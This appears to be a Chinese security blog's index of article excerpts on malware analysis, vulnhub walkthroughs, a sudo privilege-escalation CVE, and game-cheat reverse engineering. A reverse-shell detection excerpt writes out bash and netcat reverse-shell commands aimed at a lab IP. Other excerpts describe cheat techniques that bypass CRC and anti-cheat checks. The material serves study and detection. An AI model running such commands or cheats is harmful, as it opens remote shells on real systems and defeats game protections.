- 博客(56)
- 收藏
- 关注
RSS订阅原创 python使用yara-python踩坑记录
看起来是少libyara.dll,查了半天网上也没有对应解法。pip install yara-python后遇到了奇奇怪怪的错误。把这里的libyara.dll复制到正确目录就可以了。在我的Users里创建了个Users?后来找了下文件,他竟然给我放在这个目录下了。
2023-06-07 14:53:27
738
原创 yara安装与使用
yara安装与使用环境及安装工具使用yara规则编写strings部分转义大小写字符集表示匹配单个词组文本字符串condition部分infilesizeatentrypointint8/16/32、uint8/16/32of???[X-Y]them/($*)@!for xxx of xxx :(xxx)for xxx i in (xxx) :(xxx)其他yara关键字globalprivateTagRule引用规则importinclude注释mate外部变量环境及安装操作系统:win10安装地址
2022-03-09 13:32:24
8071
1
原创 Babuk勒索病毒分析
0x00 前言准备实验环境:win10分析工具:火绒剑IDA7.5die0x01 样本基本信息md5:e10713a4a5f635767dcd54d609bed9770x02 赎金信息0x03逆向分析先用die看一下基本信息32位,无壳,可以直接拉进ida看定位到start函数,程序逻辑非常清楚命令行参数参数可以传三个,分别如注释种所写,如果没有参数,默认是只本地加密。终止服务病毒在启动前会检索一系列服务并进行关闭重点关注一下有注释的几个API检索的服务是明文
2021-11-20 16:02:13
5087
1
原创 Python两文件相同字符串提取
最近工作需要写一个脚本来提取两个文件之间相同字符串,辅助病毒分析。#!/usr/bin/env python# -*- coding: utf-8 -*-import reimport sysdef strings(file): chars = r"A-Za-z0-9/\-:.,_$%'()[\]<> \u4e00-\u9fa5" shortestReturnChar = 4 regExp = '[%s]{%d,}' % (chars, shortestRe
2021-09-16 16:22:04
1133
原创 权限提升 bypass
账户权限与特权用户的权限可以通过本地安全策略(LSA,LocalSecurity Authority)进行查看,本地安全策略的位置——C:\Windows\System32\secpol.msc:根据使用的场景,这些权限可以被分为两类:账户权限和特权。账户权限账户权限(accountright)是把“执行某一特定登录类型的能力”授权或拒绝给账户。当一个用户以交互方式登录到一台机器上时,Winlogon调用LogonUser。LogonUser函数中有一个参数指明了要执行的登录的类型:交互式登陆、
2021-07-29 15:06:43
1374
原创 恶意代码常见驻留分析
前言恶意代码的一个重要功能就是要实现内存常驻,只要常驻内存,恶意代码就可以一直执行恶意行为,不会因为电脑重新启动、切换用户等原因停止。前文介绍的启动、Hook、注入中的很多技术都可以实现内存常驻,除此之外,恶意代码还可以利用一些系统功能实现内存常驻。本文就与你娓娓道来。辅助功能辅助功能介绍windows提供了一些辅助功能,比如放大镜、讲述人等。Windows的辅助功能又叫做“轻松使用”,你可以在控制面板中查看他们。这些辅助功能可以在用户登录界面启动,当你在登录界面按下win+U,就会弹出辅助功能的
2021-07-26 16:12:11
1942
2
原创 HOOK与注入
HOOK和注入技术经常被恶意代码使用。利用HOOK和注入技术,恶意代码提高了执行隐蔽性,增加了恶意代码分析难度,在某些情况下还能实现权限提升和内存常驻。HOOK技术挂钩(HOOK)就是在来往信息间安装“钩子”,钩取来往信息。在用户层,常见的Hook技术有:①消息钩子②Inline Hook③IAT Hook消息钩子原理:用户对应用程序的各种操作(eg:键盘输入、点击、移动等)都会产生事件;发生事件时,操作系统会把该事件对应的消息发送给相应的应用程序,应用程序分析收到的信息后执行相应的动作。
2021-07-21 15:16:51
4144
1
原创 文档宏病毒
文档类病毒介绍许多恶意代码都是通过文档进行传播。利用文档文件投放PE文件,再由PE文件执行恶意行为。一方面,结合社会工程学的诱导文档往往能够降低目标人员的安全防范意识,提高攻击的成功率;另一方面,文档可以通过邮件进行传播,而邮件作为最常用的通信方式,对邮箱的攻击,更容易收集用户信息并实现内网渗透。下图是奇安信威胁情报中心在2018年全球高级持续性威胁研究总结报告中列出的部分组织鱼叉邮件攻击特点:可以看到采用诱导文档附件进行的钓鱼邮件攻击的方式最为普遍。掌握各类文档文件的分析技巧就变得极为重要,我们将
2021-07-16 15:02:27
2923
原创 exe-自动安装
简介许多病毒会以安装包的形式进行传播,一方面病毒作者可以修改合法软件的安装包实现捆绑安装,另一方面病毒可以将病毒本体隐藏在包内,避免被直接查杀。能够制作安装包的软件很多,本文将介绍几款主流软件及其制作的恶意软件的分析技巧。1、MSI许多软件的安装包都是.msi格式的,msi文件的能够像exe文件一样双击运行,但是查看msi文件的文件头却会发现,msi文件并不属于PE文件。msi文件是Windows Installer的数据包,它采用了OLE(复合文件)结构,是一种压缩文件,里面包含安装(和卸载)程
2021-07-14 11:28:49
2032
1
原创 VB程序逆向
1、VB介绍Visual Basic 是一种具有良好图形用户界面的程序设计语言。Visual的意思是“可视的”,也就是直观的编程方法,在编程时不需要编写大量代码去描述界面元素的外观和位置,只需把预先建立的对象拖放到窗体上。Basic是指BASIC语言,VB使用了BASIC语言作为代码。VB采用面向对象和事件驱动的程序设计机制,这种机制下,VB程序往往是多线程的,在分析过程中定位主线程和事件处理过程尤为重要。在编译方式上,VB既有直接编译生成的可执行程序,也有间接编译生成的可执行程序,不同的编
2021-07-13 15:54:07
5797
原创 py-exe编译与反编译
计算机发展至今已经有了机器语言、汇编语言和高级语言三种。高级语言被翻译成机器语言的过程分为两类,第一种是编译,第二种是解释。编译执行的程序在执行前,会先通过编译器进行编译,把高级语言转变为机器语言,然后再执行;解释执行的程序在执行时,由解释器对程序逐行解释成机器语言,一边解释一边执行。python是一种脚本语言,但python“翻译”的过程中,不仅需要解释还需要编译,这是因为python是一门基于虚拟机的语言。一般我们都是说python通过python解释器解释执行,但实际上python
2021-07-13 11:08:47
1121
1
原创 vulnhub-DC-3靶机实战
下载地址https://www.vulnhub.com/entry/dc-3,312/实战步骤首先我们打开靶机用nmap探测主机应该是152,探测一下端口只开了个80,访问看看是一个joomla的cms,我们需要确定cms的版本,然后看看有没有能利用的漏洞。我们用如下命令:joomscan --url http://192.168.220.136确定版本,joomla3.7.0,用searchsploit工具查找Joomla 3.7....
2021-03-18 17:19:26
247
原创 KimSuky病毒样本分析
0x00 前言准备kimsuky APT组织(又名Mystery Baby, Baby Coin, Smoke Screen, BabyShark, Cobra Venom) ,该组织一直针对于韩国的智囊团,政府组织,新闻组织,大学教授等等进行活动.并且该组织拥有windows平台的攻击能力,载荷便捷,阶段繁多。并且该组织十分活跃.其载荷有带有漏洞的hwp文件,恶意宏文件,释放载荷的PE文件等。实验环境:win10分析工具:火绒剑IDAx32dbgdieprocmon...
2021-03-16 18:00:27
487
原创 vulnhub-DC-2靶机实战
下载地址https://download.vulnhub.com/dc/DC-2.zip实战步骤首先我们打开靶机用nmap探测存活主机nmap -sS 192.168.207.*151的80端口开着,我们访问看看访问不进去,观察url栏,是域名解析问题,我们修改下文件编辑/etc/hosts文件,添加靶机IP地址及对应域名:192.168.220.132 dc-2vim /etc/hosts192.168.207.151 dc-2...
2021-03-11 15:02:16
238
原创 再看Globe家族勒索病毒
0x00 前言准备病毒类别:GlobeImposter勒索病毒实验环境:win10分析工具:火绒剑IDAx32dbgdie我们之前分析过了一个Globe家族的勒索病毒,最近又遇到一个,也感觉之前那个分析的不够仔细,今天我们重新看看这个家族的勒索病毒。0x01 样本基本信息病毒样本可从微步云沙箱里获取0x02 虚拟机尝试运行1、首先虚拟机打个快照,方便我们运行木马2、网络环境一定要注意断网,虚拟机卸载虚拟网卡即可尝试运行病毒...
2021-03-11 10:17:08
471
原创 Thallium病毒分析
0x00 前言准备病毒类别:Thallium实验环境:win10分析工具:火绒剑IDAx32dbgdieprocmon在网上看到这样一个病毒样本,以新冠疫情为诱饵针对韩国的攻击,原文件是一个doc大概这样诱导用户点击,鉴于我的虚拟机没有装读文档类的软件,而且宏代码只是下载了一个文件,我们不去分析宏代码,直接分析下载的文件。0x01 样本基本信息doc样本信息:下载的payload基本信息:病毒样本从微步云获取0...
2021-03-10 17:29:21
294
原创 vulnhub-DC-1靶机实战
下载地址https://www.vulnhub.com/entry/dc-1-1,292/实战步骤首先我们打开靶机然后打开kali用nmap来探测存活主机(探测同一网段)nmap -sS 192.168.207.0/24看到150的80端口开着,应该就是我们的靶机,访问过去登陆界面,admin,root没进去(我在想屁吃)要看一下这是什么cms,这里用的Wappalyzer插件cms用的Drupal7,我们可以去msf里看看相关漏洞...
2021-03-08 17:42:58
172
原创 CVE-2021-3156复现
0x00 前言几天前爆出了一个高危sudo提权洞,这我立马就来劲了,赶紧过来复现一波涨涨知识。0x01 漏洞详情Sudo是一个功能强大的工具,其允许普通用户执行root权限命令,大多数基于Unix和Linux的操作系统都包含sudo。2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以ro...
2021-03-04 16:07:02
658
2
原创 逆向CS生成的exe马
前言Cobalt Strike(以下简称CS)是红队在渗透攻击中的一款神器,使用稳定,功能全面。本文是对CS生成的exe文件进行分析,看看CS生成的木马有什么高明之处。准备工作工具准备:Cobalt Strikeidax32dbgexeinfopeCS能生成的木马有很多种,如下图所示:这里我不一一介绍,有兴趣的同学自行去研究。我们这里先选择Windows Executable注:Windows Executable 生成可执行的分段payloa...
2021-03-01 15:33:43
2237
原创 linux检测反弹shell
1、bash -i >& /dev/tcp/192.168.110.78/6767 0>&1可以看到bash -i的输入输出和错误输出全部定位到了一个socket上我们lsof看一下bash进程我们可以看到bash远程指向一个ip,那我们完全可以判定这是一个反弹shell。2、nc -e /usr/bin/bash 192.168.110.78 6767这里我们看到bash的输入输出都定位到了管道上,而这个管道指向父进程nc,而且这两个...
2021-02-25 10:04:29
2153
原创 魔窟(WannaCry)病毒简单分析
样本基本信息云沙箱跑一下很明显是个病毒样本逆向分析拖进ida1、sub_401225我们注意到,DisplayName是没有声明的,也就是说它是一个全局变量。我们看一下在其他地方的调用(x)第一个:这里是把DisplayName变成宽字节,并写入到widecharstr中第二处开启一个服务然后关掉,如果没有DisplayName这个程序先运行在开服务接下来我们进401225看看所以此函数的作用是给传过来的参...
2021-02-02 17:00:54
591
原创 globe勒索病毒分析
先上vt检测很明显是个病毒样本基本信息沙箱检测样本行为分析1、注册表修改4109b0里我们可以观察到,这里添加了注册表项,主要功能是禁用用户组和windefener还在runonce里添加了项,即开机启动一次2、关闭数据库服务这里执行病毒内嵌的bat脚本,删除卷影,关闭机器上的数据库服务,以免加密相关文件失败。3、对文件进行遍历首先将可能空闲的卷进行挂载加密磁盘种类小于等于4的也就是除去rom和ram...
2021-02-01 15:31:04
221
原创 杀毒软件原理浅析
了解杀软之前我们先了解一下什么是病毒,《中华人民共和国计算机信息系统安全保护条例》,在《条例》第二十八条中明确指出:“计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机指令或者程序代码。”这是我国对于计算机病毒的正式定义,但是在实际中,所有会对用户的计算机安全产生威胁的,都被划入了广义的病毒范畴。病毒大致分为以下几类:传统病毒,宏病毒,恶意脚本,木马、黑客、蠕虫、破坏性程序。1. 传统病毒:能够感染的程序。通过改变文件或者其他东西进.
2020-12-03 20:46:43
4831
原创 永恒之蓝复现
re狗偶尔玩一玩渗透还是比较有意思的,今天来复现一下ms17_010靶机:win7攻击机:kali首先查看一下两台机器的IPwin7:kali:同时在win7下cmd执行gpedit.msc,然后对应下列路径改为已禁用,注意要重启!来到kali打开msf寻找17010相关模块用use auxiliary/scanner/smb/smb_ms17_010检测一下漏洞设置一下目标ip,run就行了这样显示就是可以了。我们常用的是au
2020-11-28 21:46:08
1427
原创 软件破解逆向安全(十二)内存特征码
内存特征码技术:内存种一段固定的代码,通过特征查找固定代码,定位到此处的内存地址。在辅助制作方面我们可以用在哪呢?有两个方面:1、免更新。2、防偷数据我们接下来学习一下怎么定位特征码。用植物大战僵尸举例子,我们之前实现过种植物不减少阳光,我们定位到那里的汇编代码。一个程序更新后各个代码的地址是会变的,但是其程序代码是很少变的,也就是我们要找的特征码,我们在定特征码的时候有两个不要:call不要,大跳转不要。因为这两个代码字节里是有地址的,这个会变的。字节可以当作特征码,操作码也可以,在ce中
2020-11-28 13:52:50
2453
原创 软件破解逆向安全(十一)无后座力
这是我根据人物结构推出来的功能,跟之前分析使命召唤的差不多,我这里就说说无后座力这个。后坐力的属性应该是在武器结构里的,我们之前分析子弹数量也应该是武器的属性,但子弹数量在人物属性里,看来这个游戏是把武器属性放在了人物属性里,那么我们跟着子弹的属性就可以找到武器的属性。这里我简化了一下推出子弹的地址跟着偏移我们一步步跟到武器属性。就是这里,那我们在这附近也可以找到与后坐力有关的数据,我们开枪看看哪些变了。发现a012978这个值连着开枪就会变大,不开就变成的0,那我们给锁成0..
2020-11-28 11:33:15
343
原创 各种壳的脱法及技巧
各种壳的脱法及技巧常见脱壳知识: 1.PUSHAD (压栈) 代表程序的入口点 2.POPAD (出栈) 代表程序的出口点,与PUSHAD相对应,一般找到这个,说明OEP可能就在附近 3.OEP:程序的入口点,软件加壳就是隐藏了OEP(或者用了假的OEP), 只要我们找到程序真正的OEP,就可以立刻脱壳1、模拟跟踪法无暗桩情况下使用 1.F9试运行,跑起来就无SEH暗桩之类的,否则就有. 2.ALT+M打开内存镜像,找到包含“=sfx,imports reloco tions”字符 3.地.
2020-11-27 21:27:23
844
原创 软件破解逆向安全(十)快速搜索以及其他技术
我想大家都玩过一个非常经典的游戏,就是cs1.6,有了分析使命召唤的基础,我相信大家分析cs1.6也是很容易,我们今天就来试试。还是从定位人物地址入手,先找子弹的地址精确搜索20,打几枪之后不断跟着扫,很简单的操作。但是跟了几次之后我们就会发现 还是有很多,怎么办呢?我们先选一部分拉下来,这里告诉大家一个快捷的操作,先选中一个地址,shift选中下一个,中间的地址就都被我们选上了,然后点这个:选中的就都跑到下面了(这里我选了全部的静态地址)。然后我们全选(ctrl+a)激活(快捷
2020-11-26 21:07:00
295
原创 软件破解逆向安全(九)武器结构寻找
这几天有比赛,好几天没更新了,赶紧过来水水博客。我们之前已经寻找过了人物结构的地址,是通过子弹地址来找出的。那我们找武器地址的思路是什么呢?我们可以观察我们主武器副武器之类是标了1,2,3的,可以通过这个来寻找,不断地切换来寻找。还有2百多条的时候不怎么变了,我们观察一下,300ceb48那个很像吗,而且我们变武器他也相应的变。看来就是这个,那我们取观察一下这个结构第一个就是武器背包的位置,第二个换枪发现应该是武器对应的id,剩下的在这里就很奇怪了,而且这个游戏自带一枪秒杀,所以对武器我
2020-11-26 15:19:04
172
原创 软件破解逆向安全(八 人物篇二)分析数据、结构
人物遁地原理:利用漏洞:人物蹲下和站立和蹲下人体身体高度的变化我们还是看人物结构里,观察偏移bc-c0蹲下的时候60会变成40,最后一个0会变成1,添加到ct表里尝试把第三个改成40,发现蹲了一下,激活打开,发现一直在蹲,玩过喜爱福的玩家都知道,一直蹲可以卡bug卡进地下,就是这个原理,但使命召唤引擎不同吧,这里并不能上地下。人物锁血无敌:我们找到人物数据中血条的数据,锁住就可以实现锁血。经过一番观察,我们可以看到血条数据我1200的血就被打成16..
2020-11-21 13:13:27
348
4
原创 软件破解逆向安全(八 人物篇一)分析数据、结构
接下来我们不迫害植物大战僵尸了,今天我们搞一搞fps游戏我们今天要找到人物地址,然后找到偏移的各种属性。找人物基址,最简单的就是通过子弹数量来定位,我们先找到子弹的基址。经过几轮寻找我们发现很多都是子弹的数量,那我们用哪一个呢?我们跟一下什么访问了地址,射击一下一定是有变化的,是我们想要的地址。(我这里就是我选的那个)就像这样。然后我们发现了熟悉的偏移,跟进最后一个去看看。eax=0bh(注意16进制)偏移应该是0b*4+1f4 = 220h(544)我们再跟一.
2020-11-19 20:40:39
375
原创 软件破解逆向安全(七)自动汇编框架
今天我们来玩玩ce里的一个自动汇编框架,之前我们一直都是在手动该数值和代码,那么我们能不能写个脚本来一劳永逸呢?自动会变框架就给了我们这个功能,接下来我们一起来玩玩吧。首先还是附加植物大战僵尸进程,然后我们找到阳光的地址然后我们点击查看内存按钮,然后找到 工具 -> 自动汇编 -> 模板 -> CT表框架代码这里的enable是执行,disable是禁止。如果我们想改阳光的代码,我们可以在enable里写下:167c8d08:dd ff//注意,167c
2020-11-19 11:53:44
745
原创 软件破解逆向安全(六)未知初始值的威力
通过搜索未知初始值我们会找到一些很好玩的东西,接下来我们动手玩几个。向日葵无cd产阳光:我们先ce附加植物大战僵尸,然后我们种一个向日葵,接着搜索未知值。向日葵在没生产阳光之前它的倒计时应该是不断减少的,接下来我们不断进行搜索减少数值来确定哪个地址是控制产出阳光的发现了四个,接着让游戏运行我们观察一下。倒数第二个应该是向日葵的程cd,最后一个应该是阳光落地的cd,但我改0之后没啥变化还不变回来了???不是主要目的不管了。接下来像找阳光基质一样去找找这个cd的基质.
2020-11-18 20:59:44
219
原创 软件破解逆向安全(五)CRC检测
我们先了解一下几种对抗游戏作弊的技术:⒈数据检测:对基础的游戏数据进行校验,例如坐标是否违规越界地图(坐标瞬移功能),人物短时间位移距离是否过大(人物加速功能)等等⒉CRC检测:基于游戏程序代码的检验,例如将人物移动中判断障碍物的je条件跳转修改为jmp强制跳转(人物穿墙功能)等等⒊封包检测:将游戏数据封包进行校验,防止利用封包漏洞实现违规操作,例如之前的穿X火线强登(可以登录任意账号)等等⒋机器检测:现在鹅厂 安全组好像换人了 ,游戏机器码封的都挺狠,一封就十年,不过道高...
2020-11-17 21:19:14
6404
5
原创 软件破解逆向安全(四)call应用
我们在定位关键call的时候,我们可以根据相关数据来定位我们想要找到的call。今天我们来看看与植物种植有关的call。但我们想要找到与种植植物数据那是很难的,所以我们通过定位相关数据来寻找种植call。什么与种植植物数据相关呢?一个是种植的数量会增多,还有一个是阳光的数量会减少。观察一下这两个,很明显是种植数量增加更好跟一些。我们用ce附加植物大战僵尸进程,然后我们种几个植物后找一下植物数量的动态地址。这里我们跟进第一个,因为后两个看数据访问的时候是空的。我们也可以去找静态地址来确定这个就是植
2020-11-16 20:58:52
695
原创 软件破解逆向安全(三)初识HOOK
什么是HOOK?这是逆向工程里的一个大块,我在这里几句话是一定说不清楚的,如果大家想深入了解,可以去学习一下。我这里简单说一下,hook,中文就是钩子的意思,简单理解为勾住一切事物,来实现我们想要的功能。外挂中的体现:实时读取数据(例如坐标),修改数据,不执行某处代码,过检测等等。HOOK的方式可以分为:直接修改,间接修改(找到空白地址写入自己想要执行的数据,原地址的区域做跳转,空白地址出跳转),直接修改。接下来我们还是请出植物大战僵尸作为今天的实例,我们要做的是种植物而不掉阳光。首先我
2020-11-15 12:54:30
2694
原创 软件破解逆向安全(二)关键CALL
在程序中,很多关键功能都是通过一个call来实现的,那么在我们破解软件的时候,找到这个关键call也就是我们必须要做的事情了,接下来我们通过受害者植物大战僵尸来研究一下怎么寻找这个关键call。等待第一个太阳落下来,我们找一下1:很多,等第二个阳光落下来,找2:我们把这俩收一下,找一下0:已经很少了,而且发现了一个静态地址,这个就很有趣了,我们看一下什么地方访问了这个地址:什么也没有,等一个阳光。落下一个阳光的时候出现了一句代码,我们点进去看看:这个就应该
2020-11-14 12:57:17
819
原创 软件破解逆向安全(一)初识内存地址和偏移
工具:CE内存:数字->存访在电脑中->内存实例:如何修改植物大战僵尸阳光内存搜索最核心:过滤数据先用CE加载植物大战僵尸,如下图我们可以看到目前我们的阳光数是50,我们尝试在ce里搜索精确数值,4 byte是int整数的表示。我们发现有很多数据,尝试收集一个阳光变成75再次搜索:我们发现就一个了,这时我们可以双击Value随便修改阳光的数值了。这里我们说一下动态和静态地址动态地址:临时用于存放数据的地址,黑色。特征:重新启动游戏地..
2020-11-12 20:40:04
1136
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人